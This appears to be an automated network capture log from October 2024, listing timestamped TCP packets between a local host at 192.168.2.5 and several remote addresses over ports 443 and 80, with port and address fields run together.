                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.678428888 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.678441048 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.681088924 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.681487083 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.681497097 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.726881981 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.726907015 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.774231911 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.792504072 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.792769909 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.792980909 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.793005943 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.795679092 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.795897007 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.795905113 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.799916983 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.800023079 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.800030947 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.808672905 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.808798075 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.808805943 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.854146957 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.854618073 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.898077965 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.908710957 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.911218882 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.911308050 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.911354065 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.911367893 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.911582947 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.915383101 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.918806076 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.918973923 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.918982983 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.924900055 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.925209999 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.925218105 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.969795942 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.970094919 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:14.970107079 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.017678022 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.018209934 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.019182920 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.019211054 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.019474030 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.022130966 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.023019075 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.023191929 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.023348093 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.023427010 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.023437023 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.027029037 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.027332067 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.027339935 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.031071901 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.031416893 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.031424046 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.040415049 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.040507078 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.040895939 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.040904999 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.041699886 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.067370892 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.085155010 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.132273912 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.132283926 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.138448000 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.138504982 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.138513088 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.142090082 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.142143011 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.142149925 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.146380901 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.146579981 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.146586895 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.155782938 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.155946970 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.155955076 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.169967890 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.170077085 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.170084953 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.201627970 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.201719046 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.201728106 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.242036104 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.254107952 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.254327059 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.254434109 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.254443884 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.261773109 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.261862993 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.261882067 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.261892080 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.261928082 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.267349005 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.267494917 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.267560959 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.269125938 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.269174099 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.269207001 CET49724443192.168.2.5184.28.90.27
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.269224882 CET44349724184.28.90.27192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.271264076 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.271816015 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.271867990 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.271879911 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.316498041 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.316555023 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.316571951 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.316586018 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.316787004 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.369339943 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377613068 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377659082 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377661943 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377674103 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377722979 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.377731085 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386573076 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386696100 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386737108 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386744976 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386759043 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.386778116 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.409084082 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.409396887 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.409420013 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.409790993 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.409862041 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.410487890 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413202047 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413202047 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413202047 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413202047 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413225889 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.413281918 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.428404093 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.428411961 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.432132959 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.432192087 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.432204962 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.458904028 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.458926916 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.474818945 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.484807968 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.485023022 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.485198021 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.485205889 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.493040085 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.493124962 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.493132114 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.494371891 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.494416952 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.494424105 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502315044 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502367020 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502376080 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502401114 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502444983 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502724886 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502779007 CET44349723142.250.186.78192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.502835035 CET49723443192.168.2.5142.250.186.78
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.505805016 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.694315910 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.741281033 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.741344929 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.742973089 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.743083000 CET44349727172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:15.743204117 CET49727443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.263849974 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.263890982 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.263956070 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.347872972 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.347898960 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.560169935 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.561219931 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.565619946 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.567003965 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.572124958 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.605175018 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.605271101 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.826085091 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.827419996 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.827434063 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.831959009 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.901669025 CET49734443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.901705980 CET44349734172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.901808977 CET49734443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.902729988 CET49734443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:16.902748108 CET44349734172.217.18.110192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.029388905 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.029486895 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.029607058 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.030188084 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.030222893 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.437511921 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.437578917 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.473851919 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.473932028 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.493233919 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.493257999 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.493628025 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.536686897 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.601672888 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.724934101 CET49734443192.168.2.5172.217.18.110
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.724947929 CET49715443192.168.2.5142.250.186.100
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.780247927 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.935847044 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.935925007 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.937446117 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.937478065 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.937834024 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.946453094 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:17.991342068 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.043395042 CET804973377.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.043467045 CET4973380192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.192852020 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.192914009 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.192969084 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.193003893 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.193062067 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.193101883 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.193176985 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310177088 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310228109 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310297012 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310348034 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310363054 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.310467958 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428004980 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428059101 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428103924 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428154945 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428189039 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.428335905 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545061111 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545098066 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545156002 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545171022 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545206070 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.545301914 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.663181067 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.663249016 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.663297892 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.663340092 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.663360119 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.666477919 CET49735443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.707385063 CET49731443192.168.2.54.175.87.197
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.751341105 CET443497314.175.87.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.781105995 CET4434973513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:18.781161070 CET4434973513.107.246.60192.168.2.5
